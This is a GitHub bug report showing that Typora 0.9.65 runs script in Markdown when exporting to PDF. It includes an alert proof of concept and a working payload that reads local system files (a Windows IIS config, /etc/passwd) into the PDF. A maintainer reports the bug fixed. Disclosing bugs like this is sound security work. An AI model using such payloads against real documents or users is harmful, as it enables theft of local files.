### ISSUE TITLE
Typora(v0.9.65) XSS when exporting to PDF

### ISSUE THREAD

**Issue by yukiyukiiiii** [typora/typora-issues#2232]
Tested on Win7
Ver0.9.65beta
![](https://raw.githubusercontent.com/yukiyukiiiii/pic/master/1.PNG)
`<script>alert(document.location)</script>`
xss when exporting to PDF
![](https://raw.githubusercontent.com/yukiyukiiiii/pic/master/2.PNG)
![](https://raw.githubusercontent.com/yukiyukiiiii/pic/master/3.PNG)

and can resulting to information leak
`<script>x=new XMLHttpRequest;x.onload=function(){document.write('\<font style="opacity:.01"\>'+this.responseText+'\<\/font\>')};x.open("GET","file:///C:/Windows/system32/inetsrv/MetaBase.xml");x.send();</script>`
![](https://raw.githubusercontent.com/yukiyukiiiii/pic/master/4.PNG)
![](https://raw.githubusercontent.com/yukiyukiiiii/pic/master/5.PNG)

**Comment by yukiyukiiiii** [comment]
ps:tested on linux using /etc/passwd

**Comment by abnerlee** [comment]
fixed in new release
